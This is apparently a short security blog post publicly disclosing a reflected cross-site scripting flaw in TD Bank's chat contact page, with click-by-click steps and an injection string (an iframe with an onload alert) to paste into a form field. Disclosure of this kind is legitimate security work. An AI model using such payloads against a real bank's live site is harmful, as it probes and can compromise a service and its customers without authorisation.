Thursday, 16 March 2023

Full Disclosure - TDBank Reflected Cross Site Script

 Application

  • TDBank chat web page


Information

  • Input not validated
  • Reflect Cross Site Scripting flaw


Exploit

XSS #1

1. Browse to Online Store

1. Browse to Personal Banking -> Contact Us

2. Select Pages -> Have General Question -> Ask now

3. Paste Payload -> TD Bank SWIFT/BIC code"><iframe width="1000px" height="450px" src="" onload=alert('XSS')>



No comments:

Post a Comment

Friday Fun Pentest Series - 16 - Stored XSS with Filter Bypass - blogenginev3.3.8

Description - It was found that the application was vulnerable to Stored XSS via specific payload that bypassed the filtering in place. Stor...